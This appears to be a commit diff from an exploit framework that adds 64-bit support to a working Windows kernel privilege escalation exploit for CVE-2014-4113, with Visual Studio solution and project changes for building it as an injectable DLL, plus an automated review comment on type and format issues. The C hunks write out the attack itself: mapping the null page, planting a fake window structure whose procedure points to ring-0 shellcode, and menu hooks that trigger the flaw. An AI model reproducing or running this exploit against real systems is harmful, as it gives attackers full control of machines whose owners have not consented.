Land jvazquez-r7#22, @zeroSteiner 64 bits version
commit
f24129933f
|
@ -1,18 +1,26 @@
|
||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 11.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual Studio 2010
|
# Visual Studio Express 2013 for Windows Desktop
|
||||||
|
VisualStudioVersion = 12.0.30723.0
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
|
||||||
EndProject
|
EndProject
|
||||||
Global
|
Global
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
Debug|Win32 = Debug|Win32
|
Debug|Win32 = Debug|Win32
|
||||||
|
Debug|x64 = Debug|x64
|
||||||
Release|Win32 = Release|Win32
|
Release|Win32 = Release|Win32
|
||||||
|
Release|x64 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
HideSolutionNode = FALSE
|
HideSolutionNode = FALSE
|
||||||
|
|
|
@ -16,9 +16,13 @@ typedef NTSTATUS *PNTSTATUS;
|
||||||
|
|
||||||
#define DEBUGGING FALSE
|
#define DEBUGGING FALSE
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
typedef unsigned __int64 QWORD;
|
||||||
|
typedef QWORD *PQWORD;
|
||||||
|
#endif
|
||||||
|
|
||||||
int WndProcClue = 0;
|
int WndProcClue = 0;
|
||||||
int HookCallbackClue = 0;
|
int HookCallbackClue = 0;
|
||||||
int HookCallbackThreeClue = 0;
|
|
||||||
WNDPROC lpPrevWndFunc;
|
WNDPROC lpPrevWndFunc;
|
||||||
DWORD MyProcessId = 0;
|
DWORD MyProcessId = 0;
|
||||||
DWORD OffsetWindows = 0;
|
DWORD OffsetWindows = 0;
|
||||||
|
@ -45,15 +49,15 @@ typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
|
||||||
);
|
);
|
||||||
|
|
||||||
typedef struct _SYSTEM_MODULE {
|
typedef struct _SYSTEM_MODULE {
|
||||||
ULONG Reserved1;
|
HANDLE Reserved1;
|
||||||
ULONG Reserved2;
|
PVOID Reserved2;
|
||||||
PVOID ImageBaseAddress;
|
PVOID ImageBaseAddress;
|
||||||
ULONG ImageSize;
|
ULONG ImageSize;
|
||||||
ULONG Flags;
|
ULONG Flags;
|
||||||
WORD Id;
|
USHORT Id;
|
||||||
WORD Rank;
|
USHORT Rank;
|
||||||
WORD w018;
|
USHORT w018;
|
||||||
WORD NameOffset;
|
USHORT NameOffset;
|
||||||
BYTE Name[256];
|
BYTE Name[256];
|
||||||
} SYSTEM_MODULE, *PSYSTEM_MODULE;
|
} SYSTEM_MODULE, *PSYSTEM_MODULE;
|
||||||
|
|
||||||
|
@ -66,48 +70,28 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
|
||||||
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
||||||
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
||||||
|
|
||||||
LRESULT __stdcall HookCallbackThree(int code, WPARAM wParam, LPARAM lParam)
|
|
||||||
|
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||||
{
|
{
|
||||||
if (wParam == 4 && *(DWORD *)lParam == GetCurrentThreadId() && *(DWORD *)(lParam + 12) == 0x900516)
|
EndMenu();
|
||||||
HookCallbackThreeClue = 1;
|
return -5;
|
||||||
return CallNextHookEx(0, code, wParam, lParam);
|
|
||||||
}
|
}
|
||||||
|
|
||||||
LRESULT __stdcall HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
||||||
{
|
#ifdef _M_X64
|
||||||
LRESULT result;
|
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
|
||||||
DWORD v5;
|
#else
|
||||||
|
|
||||||
if (Msg == 0x1EB)
|
|
||||||
{
|
|
||||||
v5 = GetCurrentThreadId();
|
|
||||||
SetWindowsHookExA(9, HookCallbackThree, 0, v5);
|
|
||||||
SendMessageA(hWnd, 0, 0x900516u, 0);
|
|
||||||
UnhookWindowsHook(9, HookCallbackThree);
|
|
||||||
if (HookCallbackThreeClue)
|
|
||||||
{
|
|
||||||
EndMenu();
|
|
||||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, 0x1EBu, wParam, lParam);
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
EndMenu();
|
|
||||||
result = -5;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, Msg, wParam, lParam);
|
|
||||||
}
|
|
||||||
return result;
|
|
||||||
}
|
|
||||||
|
|
||||||
LRESULT __stdcall HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
|
||||||
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
|
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
|
||||||
|
#endif
|
||||||
{
|
{
|
||||||
HookCallbackClue = 1;
|
HookCallbackClue = 1;
|
||||||
if (UnhookWindowsHook(4, HookCallback))
|
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
|
||||||
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), -4, (LONG)HookCallbackTwo);
|
#ifdef _M_X64
|
||||||
|
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
||||||
|
#else
|
||||||
|
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
|
||||||
|
#endif
|
||||||
|
}
|
||||||
}
|
}
|
||||||
return CallNextHookEx(0, code, wParam, lParam);
|
return CallNextHookEx(0, code, wParam, lParam);
|
||||||
}
|
}
|
||||||
|
@ -122,13 +106,21 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
|
||||||
return DefWindowProc(hwnd, msg, wParam, lParam);
|
return DefWindowProc(hwnd, msg, wParam, lParam);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
QWORD MyPtiCurrent(void) {
|
||||||
|
void *teb = (void *)__readgsqword(0x30);
|
||||||
|
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
|
||||||
|
|
||||||
|
return Win32ThreadInfo;
|
||||||
|
}
|
||||||
|
#else
|
||||||
DWORD __stdcall MyPtiCurrent() {
|
DWORD __stdcall MyPtiCurrent() {
|
||||||
__asm {
|
__asm {
|
||||||
mov eax, fs : 18h
|
mov eax, fs : 18h
|
||||||
mov eax, [eax + 40h]
|
mov eax, [eax + 40h]
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
#endif
|
||||||
|
|
||||||
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
|
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
|
||||||
void *my_process_info = NULL;
|
void *my_process_info = NULL;
|
||||||
|
@ -151,6 +143,7 @@ LogMessage(char* pszFormat, ...) {
|
||||||
va_list args;
|
va_list args;
|
||||||
va_start(args, pszFormat);
|
va_start(args, pszFormat);
|
||||||
vsprintf(s_acBuf, pszFormat, args);
|
vsprintf(s_acBuf, pszFormat, args);
|
||||||
|
printf("%s\n", s_acBuf);
|
||||||
OutputDebugString(s_acBuf);
|
OutputDebugString(s_acBuf);
|
||||||
va_end(args);
|
va_end(args);
|
||||||
}
|
}
|
||||||
|
@ -184,6 +177,12 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
||||||
|
LogMessage("[*] Windows 6.1 found...");
|
||||||
|
OffsetWindows = 0x208;
|
||||||
|
}
|
||||||
|
#else
|
||||||
if (VersionInformation.dwMajorVersion == 6) {
|
if (VersionInformation.dwMajorVersion == 6) {
|
||||||
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
||||||
LogMessage("[*] Windows 6.1 found...");
|
LogMessage("[*] Windows 6.1 found...");
|
||||||
|
@ -212,6 +211,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
#endif
|
||||||
else {
|
else {
|
||||||
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
|
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
|
||||||
return;
|
return;
|
||||||
|
@ -306,9 +306,13 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
|
||||||
|
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
|
||||||
|
#else
|
||||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
|
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
|
||||||
|
|
||||||
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
|
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
|
||||||
|
#endif
|
||||||
|
|
||||||
MyProcessId = GetCurrentProcessId();
|
MyProcessId = GetCurrentProcessId();
|
||||||
|
|
||||||
|
@ -336,7 +340,11 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
// Making everything ready for exploitation...
|
// Making everything ready for exploitation...
|
||||||
|
|
||||||
LogMessage("[*] Allocating null page...");
|
LogMessage("[*] Allocating null page...");
|
||||||
|
#ifdef _M_X64
|
||||||
|
ULONGLONG base_address = 0x00000000fffffffb;
|
||||||
|
#else
|
||||||
DWORD base_address = 1;
|
DWORD base_address = 1;
|
||||||
|
#endif
|
||||||
SIZE_T region_size = 0x1000;
|
SIZE_T region_size = 0x1000;
|
||||||
ULONG zero_bits = 0;
|
ULONG zero_bits = 0;
|
||||||
HANDLE current_process = NULL;
|
HANDLE current_process = NULL;
|
||||||
|
@ -350,7 +358,11 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
|
|
||||||
LogMessage("[*] Getting PtiCurrent...");
|
LogMessage("[*] Getting PtiCurrent...");
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
ULONGLONG pti = MyPtiCurrent();
|
||||||
|
#else
|
||||||
DWORD pti = MyPtiCurrent();
|
DWORD pti = MyPtiCurrent();
|
||||||
|
#endif
|
||||||
|
|
||||||
if (pti == 0) {
|
if (pti == 0) {
|
||||||
LoadLibrary("user32.dll");
|
LoadLibrary("user32.dll");
|
||||||
|
@ -363,11 +375,28 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
|
#ifdef _M_X64
|
||||||
|
LogMessage("[*] Good! pti 0x%016llx", pti);
|
||||||
|
#else
|
||||||
LogMessage("[*] Good! pti 0x%08x", pti);
|
LogMessage("[*] Good! pti 0x%08x", pti);
|
||||||
|
#endif
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
LogMessage("[*] Creating a fake structure at NULL...");
|
LogMessage("[*] Creating a fake structure at NULL...");
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
void *test = NULL;
|
||||||
|
(QWORD)test = 0x10000000B;
|
||||||
|
*((PQWORD)test) = pti;
|
||||||
|
|
||||||
|
/* win32k!tagWND->bServerSideWindowProc = TRUE */
|
||||||
|
(QWORD)test = 0x100000025;
|
||||||
|
*((PBYTE)test) = 4;
|
||||||
|
|
||||||
|
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
|
||||||
|
(QWORD)test = 0x10000008B;
|
||||||
|
*((PQWORD)test) = &shellcode_ring0;
|
||||||
|
#else
|
||||||
void *test = promise_land + 3;
|
void *test = promise_land + 3;
|
||||||
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
|
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
|
||||||
.text:BF8B93F4 02C mov edi, _gptiCurrent
|
.text:BF8B93F4 02C mov edi, _gptiCurrent
|
||||||
|
@ -380,7 +409,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
|
|
||||||
test = promise_land + 0x5b;
|
test = promise_land + 0x5b;
|
||||||
*(LPDWORD)test = (DWORD)shellcode_ring0;
|
*(LPDWORD)test = (DWORD)shellcode_ring0;
|
||||||
|
#endif
|
||||||
|
|
||||||
// Exploit!
|
// Exploit!
|
||||||
|
|
||||||
|
@ -394,7 +423,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
MENUITEMINFOA MenuOneInfo;
|
MENUITEMINFOA MenuOneInfo;
|
||||||
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
|
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
|
||||||
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
|
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||||
MenuOneInfo.fMask = 64;
|
MenuOneInfo.fMask = MIIM_STRING;
|
||||||
|
|
||||||
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
|
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
|
||||||
LogMessage("[!] First InsertMenuItemA failed");
|
LogMessage("[!] First InsertMenuItemA failed");
|
||||||
|
@ -412,7 +441,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
MENUITEMINFOA MenuTwoInfo;
|
MENUITEMINFOA MenuTwoInfo;
|
||||||
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
|
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
|
||||||
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
|
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||||
MenuTwoInfo.fMask = 68;
|
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
|
||||||
MenuTwoInfo.dwTypeData = "";
|
MenuTwoInfo.dwTypeData = "";
|
||||||
MenuTwoInfo.cch = 1;
|
MenuTwoInfo.cch = 1;
|
||||||
MenuTwoInfo.hSubMenu = MenuOne;
|
MenuTwoInfo.hSubMenu = MenuOne;
|
||||||
|
@ -423,8 +452,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
DWORD thread_id = GetCurrentThreadId();
|
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
|
||||||
if (SetWindowsHookExA(4, HookCallback, NULL, thread_id) == NULL) {
|
|
||||||
LogMessage("[!] SetWindowsHookExA failed :-(\n");
|
LogMessage("[!] SetWindowsHookExA failed :-(\n");
|
||||||
DestroyMenu(MenuTwo);
|
DestroyMenu(MenuTwo);
|
||||||
DestroyMenu(MenuOne);
|
DestroyMenu(MenuOne);
|
||||||
|
|
|
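Review bot: `HookCallbackTwo` is declared to return `long`, yet it is installed as a window procedure through the `(WNDPROC)` cast and `SetWindowLongPtr(..., GWLP_WNDPROC, ...)` in the `HookCallback` hunk, and `WNDPROC` returns `LRESULT` (`LONG_PTR`, 64 bits on the x64 build this commit adds), so a 32-bit `long` return may leave the upper half of the returned register unspecified when the system calls it. Declare it `LRESULT CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)`, matching the `LRESULT CALLBACK HookCallback` signature beside it. In the `pPsLookupProcessByProcessId` logging hunk a function pointer is passed to `%016llx` / `%08x`; `%p` is the portable conversion and would let a single `LogMessage` line replace that `#ifdef _M_X64` pair.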
@ -5,10 +5,18 @@
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
<Platform>Win32</Platform>
|
<Platform>Win32</Platform>
|
||||||
</ProjectConfiguration>
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
<ProjectConfiguration Include="Release|Win32">
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
<Configuration>Release</Configuration>
|
<Configuration>Release</Configuration>
|
||||||
<Platform>Win32</Platform>
|
<Platform>Win32</Platform>
|
||||||
</ProjectConfiguration>
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<PropertyGroup Label="Globals">
|
<PropertyGroup Label="Globals">
|
||||||
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
|
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
|
||||||
|
@ -22,6 +30,13 @@
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
|
@ -29,22 +44,41 @@
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
@ -60,6 +94,21 @@
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
@ -76,10 +125,26 @@
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClCompile Include="cve-2014-4113.c" />
|
<ClCompile Include="cve-2014-4113.c" />
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
<ImportGroup Label="ExtensionTargets">
|
<ImportGroup Label="ExtensionTargets">
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
</Project>
|
</Project>
|
|
